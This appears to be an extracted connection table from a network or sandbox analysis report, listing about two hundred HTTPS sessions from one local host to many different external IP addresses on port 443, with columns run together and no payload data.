                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12669192.168.2.145740095.10.34.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12670192.168.2.1435296102.217.172.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12671192.168.2.144431642.119.152.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12672192.168.2.145691271.44.89.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12673192.168.2.146012076.192.90.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12674192.168.2.1438136113.91.26.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12675192.168.2.1450034159.174.140.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12676192.168.2.144250467.165.111.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12677192.168.2.1439508122.127.79.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12678192.168.2.144870674.117.68.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12679192.168.2.1442598151.202.50.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12680192.168.2.1446050111.243.188.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12681192.168.2.145047453.153.175.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12682192.168.2.1459080209.103.132.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12683192.168.2.1444774174.158.139.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12684192.168.2.1437278120.156.125.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12685192.168.2.1443920130.38.126.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12686192.168.2.1450182129.37.178.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12687192.168.2.1456794117.252.175.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12688192.168.2.1432924140.72.145.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12689192.168.2.1457396113.5.96.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12690192.168.2.144728234.160.27.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12691192.168.2.1435482112.238.215.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12692192.168.2.1448502204.184.64.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12693192.168.2.143355250.200.59.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12694192.168.2.143542448.167.228.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12695192.168.2.143794234.92.219.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12696192.168.2.1440682109.107.22.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12697192.168.2.1440176147.16.227.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12698192.168.2.1443706193.102.58.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12699192.168.2.1455576116.131.94.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12700192.168.2.143449288.56.19.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12701192.168.2.1457778150.116.188.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12702192.168.2.1438262124.130.138.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12703192.168.2.1438728158.123.108.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12704192.168.2.1450432124.34.53.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12705192.168.2.145916692.141.66.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12706192.168.2.1447102122.157.79.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12707192.168.2.1439190179.72.196.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12708192.168.2.1456672149.154.181.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12709192.168.2.143356042.111.203.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12710192.168.2.1447200121.57.59.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12711192.168.2.143686896.161.77.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12712192.168.2.1435078102.15.247.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12713192.168.2.1433316103.2.191.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12714192.168.2.143622651.108.8.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12715192.168.2.145506867.156.155.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12716192.168.2.146033648.193.132.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12717192.168.2.145150242.143.203.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12718192.168.2.1446574212.32.26.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12719192.168.2.143442657.250.134.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12720192.168.2.1435744222.246.124.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12721192.168.2.144284085.145.157.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12722192.168.2.143988842.105.102.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12723192.168.2.1439080193.11.158.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12724192.168.2.1453766220.26.67.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12725192.168.2.1438830143.225.209.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12726192.168.2.145188870.112.5.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12727192.168.2.1433448200.122.116.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12728192.168.2.14451269.138.248.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12729192.168.2.145952090.200.49.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12730192.168.2.1450636180.108.62.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12731192.168.2.144496040.182.217.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12732192.168.2.1444594145.164.230.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12733192.168.2.145915065.206.36.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12734192.168.2.145715494.35.214.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12735192.168.2.145790251.146.86.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12736192.168.2.1453550140.154.233.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12737192.168.2.143747440.116.74.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12738192.168.2.144342060.142.68.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12739192.168.2.1449020103.227.165.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12740192.168.2.143511662.207.103.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12741192.168.2.143917493.20.110.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12742192.168.2.1445590182.144.244.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12743192.168.2.145765614.78.47.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12744192.168.2.145940649.231.251.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12745192.168.2.1442522212.30.170.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12746192.168.2.1442088179.30.39.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12747192.168.2.145778639.135.146.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12748192.168.2.1454808109.167.36.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12749192.168.2.1441142155.167.237.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12750192.168.2.144648074.16.145.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12751192.168.2.1455510158.36.194.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12752192.168.2.1439052119.4.234.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12753192.168.2.144812282.90.255.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12754192.168.2.146050217.104.194.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12755192.168.2.1449486160.147.93.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12756192.168.2.144969078.101.19.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12757192.168.2.1443178142.171.225.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12758192.168.2.146048252.78.64.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12759192.168.2.145446640.16.73.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12760192.168.2.1438532207.112.177.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12761192.168.2.144884895.212.107.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12762192.168.2.1443794140.188.62.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12763192.168.2.1436888184.124.171.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12764192.168.2.143503270.104.251.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12765192.168.2.144597643.189.67.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12766192.168.2.145606886.172.14.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12767192.168.2.1457934176.56.146.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12768192.168.2.144269468.115.248.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12769192.168.2.1443162175.163.85.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12770192.168.2.1460572150.34.138.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12771192.168.2.145662898.37.9.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12772192.168.2.1434200115.118.72.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12773192.168.2.1460476182.172.89.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12774192.168.2.145583068.139.80.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12775192.168.2.1458204141.118.47.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12776192.168.2.144692093.61.255.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12777192.168.2.14331769.49.250.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12778192.168.2.144646238.252.101.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12779192.168.2.143654686.172.130.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12780192.168.2.144095088.174.48.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12781192.168.2.1433712194.68.67.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12782192.168.2.1446232153.150.12.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12783192.168.2.1442146159.202.112.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12784192.168.2.144630041.144.89.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12785192.168.2.145523853.190.66.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12786192.168.2.145777669.66.99.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12787192.168.2.1437914152.139.245.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12788192.168.2.145066212.6.149.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12789192.168.2.145527812.219.251.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12790192.168.2.144029084.12.247.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12791192.168.2.143677260.34.172.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12792192.168.2.143331625.10.10.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12793192.168.2.144377269.67.114.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12794192.168.2.143741042.49.88.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12795192.168.2.144526459.7.130.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12796192.168.2.1451374109.68.61.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12797192.168.2.145138069.187.117.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12798192.168.2.145768825.178.235.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12799192.168.2.1450676204.58.108.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12800192.168.2.145218894.113.200.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12801192.168.2.1447530183.240.37.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12802192.168.2.1450484121.133.141.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12803192.168.2.143392284.228.225.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12804192.168.2.1434534189.219.235.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12805192.168.2.1444468158.168.175.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12806192.168.2.1438736121.207.128.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12807192.168.2.1438660104.224.43.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12808192.168.2.1435778109.207.35.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12809192.168.2.14449489.68.190.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12810192.168.2.1446860110.210.54.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12811192.168.2.145805675.150.46.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12812192.168.2.145602074.175.172.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12813192.168.2.1448308110.6.52.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12814192.168.2.1442850173.215.222.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12815192.168.2.143912842.128.136.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12816192.168.2.1439652205.63.149.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12817192.168.2.1450416194.247.15.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12818192.168.2.1446266181.244.74.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12819192.168.2.1442696119.172.235.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12820192.168.2.1437052190.179.230.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12821192.168.2.144421819.44.190.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12822192.168.2.1454884190.113.104.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12823192.168.2.1442254206.133.108.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12824192.168.2.1447316133.212.61.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12825192.168.2.1455894158.137.150.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12826192.168.2.14358222.189.243.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12827192.168.2.144307639.183.142.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12828192.168.2.1435722152.80.206.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12829192.168.2.1452374100.196.181.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12830192.168.2.146054842.34.26.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12831192.168.2.145797061.16.115.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12832192.168.2.144205488.236.179.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12833192.168.2.1448544163.112.147.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12834192.168.2.1457170115.40.110.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12835192.168.2.1435202116.120.249.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12836192.168.2.146004217.235.222.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12837192.168.2.144464498.101.18.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12838192.168.2.1442002181.16.223.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12839192.168.2.145348647.4.118.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12840192.168.2.1434616135.163.2.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12841192.168.2.1442298175.142.26.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12842192.168.2.1437296124.55.134.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12843192.168.2.1457368114.227.180.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12844192.168.2.145675887.231.127.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12845192.168.2.14546222.129.48.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12846192.168.2.143996671.111.70.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12847192.168.2.1451002124.235.53.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12848192.168.2.1459398166.59.239.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12849192.168.2.1459736138.105.156.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12850192.168.2.144845294.16.57.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12851192.168.2.145636059.242.230.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12852192.168.2.1435358203.181.52.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12853192.168.2.1442454221.101.130.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12854192.168.2.145914490.67.233.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12855192.168.2.144345474.233.109.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12856192.168.2.145225236.44.179.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12857192.168.2.143535885.141.61.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12858192.168.2.1440192101.159.87.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12859192.168.2.144264271.37.230.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12860192.168.2.145551675.227.205.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12861192.168.2.143515872.251.28.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12862192.168.2.143609224.196.163.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12863192.168.2.1454270128.115.0.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12864192.168.2.1459466101.62.171.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12865192.168.2.1458226138.169.129.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12866192.168.2.1433854208.76.169.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12867192.168.2.144856663.182.81.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12868192.168.2.1445676164.192.191.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12869192.168.2.145983891.192.140.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12870192.168.2.1441740106.3.9.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12871192.168.2.1442196123.42.96.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12872192.168.2.145722234.225.134.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12873192.168.2.1440002179.14.75.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12874192.168.2.1446324180.76.200.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12875192.168.2.1441204205.170.201.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12876192.168.2.143377244.67.32.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12877192.168.2.1438482111.129.195.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12878192.168.2.1435030172.233.220.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12879192.168.2.1457504124.176.193.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12880192.168.2.1451932159.78.158.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
